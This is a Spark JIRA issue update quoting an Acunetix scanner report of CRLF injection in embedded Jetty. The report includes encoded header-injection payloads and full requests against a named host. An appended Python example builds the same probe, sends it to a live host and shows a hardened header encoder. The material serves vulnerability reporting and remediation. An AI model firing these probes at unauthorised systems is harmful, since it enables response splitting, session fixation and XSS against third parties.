Posted to issues@spark.apache.org by "Jerry Garcia (JIRA)" <ji...@apache.org> on 2019/03/15 04:14:00 UTC

[jira] [Updated] (SPARK-27172) CRLF Injection/HTTP response splitting on spark embedded jetty servlet.

     [ https://issues.apache.org/jira/browse/SPARK-27172?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Jerry Garcia updated SPARK-27172:
---------------------------------
    Description: 
Can we upgrade the embedded Jetty servlet on Spark 1.6.2? Is this possible, or will there be any impact if we do upgrade it?

Please refer to the provided attachment for more information.
 

  was:
Can we upgrade the embedded Jetty servlet on Spark 1.6.2? Is this possible, or will there be any impact if we do upgrade it?

Please refer to the provided attachment for more information.
  CVS: CRLF injection/HTTP response splitting
  Severity: Medium
  Description:
    This script is possibly vulnerable to CRLF injection attacks.
    HTTP headers have the structure "Key: Value", where each line is separated by the CRLF combination. If the user input is injected into the value section without properly escaping/removing CRLF characters it is possible to alter the HTTP headers structure.
    HTTP Response Splitting is a new application attack technique which enables various new attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and cross-site scripting (XSS). The attacker sends a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response.
  Impact:
    It is possible for a remote attacker to inject custom HTTP headers. For example, an attacker can inject session cookies or HTML code. This may lead to vulnerabilities like XSS (cross-site scripting) or session fixation.
  Recommendation:
    You need to restrict CR(0x13) and LF(0x10) from the user input or properly encode the output in order to prevent the injection of custom HTTP headers.
  Affected:
    Web Server
    Details:
      URL encoded GET input page was set to %c4%8d%c4%8aSomeCustomInjectedHeader:%20injected_by_wvs
      Injected header found:
        SomeCustomInjectedHeader: injected_by_wvs
      Request headers:
        GET /?page=%c4%8d%c4%8aSomeCustomInjectedHeader:%20injected_by_wvs&showIncomplete=false HTTP/1.1
        Referer: https://app30.goldmine.bdo.com.ph
        Host: app30.goldmine.bdo.com.ph
        Connection: Keep-alive
        Accept-Encoding: gzip,deflate
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
        Acunetix-Product: WVS/11.0 (Acunetix - WVSE)
        Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
        Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
        Accept: */*

    Web Server
    Details:
      URL encoded GET input showIncomplete was set to %c4%8d%c4%8aSomeCustomInjectedHeader:%20injected_by_wvs
      Injected header found:
        SomeCustomInjectedHeader: injected_by_wvs
      Request headers:
        GET /?page=3&showIncomplete=%c4%8d%c4%8aSomeCustomInjectedHeader:%20injected_by_wvs HTTP/1.1
        Referer: https://app30.goldmine.bdo.com.ph
        Host: app30.goldmine.bdo.com.ph
        Connection: Keep-alive
        Accept-Encoding: gzip,deflate
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
        Acunetix-Product: WVS/11.0 (Acunetix - WVSE)
        Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
        Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
        Accept: */*
  Reference:
    Acunetix CRLF Injection Attack (http://www.acunetix.com/websitesecurity/crlf-injection.htm)
    Whitepaper - HTTP Response Splitting (http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf)
    Introduction to HTTP Response Splitting (http://www.securiteam.com/securityreviews/5WP0E2KFGK.html)
    https://www.cvedetails.com/cve/CVE-2007-5615/
    https://cwe.mitre.org/data/definitions/113.html


> CRLF Injection/HTTP response splitting on spark embedded jetty servlet.
> -----------------------------------------------------------------------
>
>                 Key: SPARK-27172
>                 URL: https://issues.apache.org/jira/browse/SPARK-27172
>             Project: Spark
>          Issue Type: Question
>          Components: Web UI
>    Affects Versions: 1.6.2
>            Reporter: Jerry Garcia
>            Priority: Major
>
> Can we upgrade the embedded Jetty servlet on Spark 1.6.2? Is this possible, or will there be any impact if we do upgrade it?
> Please refer to the provided attachment for more information.
>  



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

---------------------------------------------------------------------
To unsubscribe, e-mail: issues-unsubscribe@spark.apache.org
For additional commands, e-mail: issues-help@spark.apache.org
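Added example (not code from Apache Spark, Jetty, Acunetix or the reporter): the probe the scanner report describes, the check that decides "Injected header found", and a hardened header encoder, worked in Python. Two things the report leaves implicit: CR is 0x0D and LF is 0x0A (the 0x13/0x10 in the recommendation text are not the right code points), and the probe value %c4%8d%c4%8a is UTF-8 for U+010D U+010A, not a literal CR/LF. The server model `narrow_to_bytes_lossy` is an assumption about why such a probe works: a container that keeps only the low byte of each decoded character turns U+010D into 0x0D and U+010A into 0x0A. The page does not say which mechanism affected the scanned host or Spark 1.6.2's Jetty; `probe_live` is the check to run against a system you are authorised to test. The names `MARKER_NAME`, `build_redirect` and `probe_live` are this example's own.

```python
"""CRLF-injection probe, check and fix, modelled on the scanner report above.

Added example; not code from Apache Spark, Jetty, Acunetix or the bug reporter.
ASSUMPTION: narrow_to_bytes_lossy models one documented reason a %c4%8d%c4%8a
probe works (low-byte truncation of U+010D -> 0x0D, U+010A -> 0x0A). Whether
that is what the scanned host did is not stated on the page.
"""
import http.client
from urllib.parse import quote, unquote_to_bytes

MARKER_NAME = "SomeCustomInjectedHeader"   # marker header from the scanner report
MARKER_VALUE = "injected_by_wvs"


def build_payload(name: str = MARKER_NAME, value: str = MARKER_VALUE) -> str:
    """URL-encoded probe: U+010D U+010A, then a complete 'Name: value' header line."""
    raw = "\u010d\u010a" + f"{name}: {value}"
    return quote(raw.encode("utf-8"), safe=":")


def decode_query_value(encoded: str) -> str:
    """What the application sees: percent-decoded bytes interpreted as UTF-8."""
    return unquote_to_bytes(encoded).decode("utf-8")


def narrow_to_bytes_lossy(value: str) -> bytes:
    """ASSUMED legacy behaviour: keep only the low byte of every character.

    U+010D U+010A become 0x0D 0x0A on the wire even though the decoded string
    contains no literal CR or LF, so an input filter for '\\r' and '\\n' alone
    would not catch it.
    """
    return bytes(ord(ch) & 0xFF for ch in value)


def narrow_to_bytes_strict(value: str) -> bytes:
    """Hardened encoder: reject CR/LF and refuse characters outside ISO-8859-1
    instead of truncating them (str.encode('latin-1') raises on U+010D)."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF not allowed in an HTTP header value")
    return value.encode("latin-1")   # UnicodeEncodeError is a ValueError subclass


def header_value_rejected(value: str) -> bool:
    """True if the hardened encoder refuses `value`."""
    try:
        narrow_to_bytes_strict(value)
    except ValueError:
        return True
    return False


def build_redirect(page: str, narrow, param: str = "page") -> bytes:
    """Server model: a 302 whose Location echoes the user-controlled query value."""
    return (b"HTTP/1.1 302 Found\r\nLocation: /?" + param.encode("ascii") + b"="
            + narrow(page) + b"\r\nContent-Length: 0\r\n\r\n")


def parse_headers(response: bytes) -> dict:
    """Split the header block on CRLF and collect 'Name: value' pairs, like a lenient client."""
    head = response.partition(b"\r\n\r\n")[0]
    headers = {}
    for line in head.split(b"\r\n")[1:]:        # [0] is the status line
        name, sep, val = line.partition(b":")
        if sep:
            headers[name.strip().decode("latin-1")] = val.strip().decode("latin-1")
    return headers


def injected_header_found(response: bytes, name: str = MARKER_NAME,
                          value: str = MARKER_VALUE) -> bool:
    """The scanner's verdict: did the marker come back as its own header line?"""
    return parse_headers(response).get(name) == value


def probe_live(host: str, param: str = "page", use_tls: bool = True,
               timeout: float = 10.0) -> bool:
    """Send the real probe to /?<param>=<payload> and inspect the response headers.

    Only against systems you are authorised to test. Not exercised offline.
    """
    conn_cls = http.client.HTTPSConnection if use_tls else http.client.HTTPConnection
    conn = conn_cls(host, timeout=timeout)
    try:
        conn.request("GET", f"/?{param}={build_payload()}", headers={"Accept": "*/*"})
        return conn.getresponse().getheader(MARKER_NAME) == MARKER_VALUE
    finally:
        conn.close()


if __name__ == "__main__":
    payload = build_payload()
    decoded = decode_query_value(payload)
    print("probe:", payload)
    print("lossy server splits the response:",
          injected_header_found(build_redirect(decoded, narrow_to_bytes_lossy)))
    print("strict encoder rejects the Unicode probe:", header_value_rejected(decoded))
    print("strict encoder rejects plain %0d%0a:",
          header_value_rejected(decode_query_value("%0d%0aX:%20y")))
```

The same probe applies to the second finding by passing `param="showIncomplete"`. The design point is that the fix belongs in the header encoder, not only in an input filter: a filter that strips literal CR/LF passes the Unicode probe unchanged, whereas an encoder that refuses anything outside ISO-8859-1 and anything containing CR/LF closes both the plain %0d%0a and the %c4%8d%c4%8a variants.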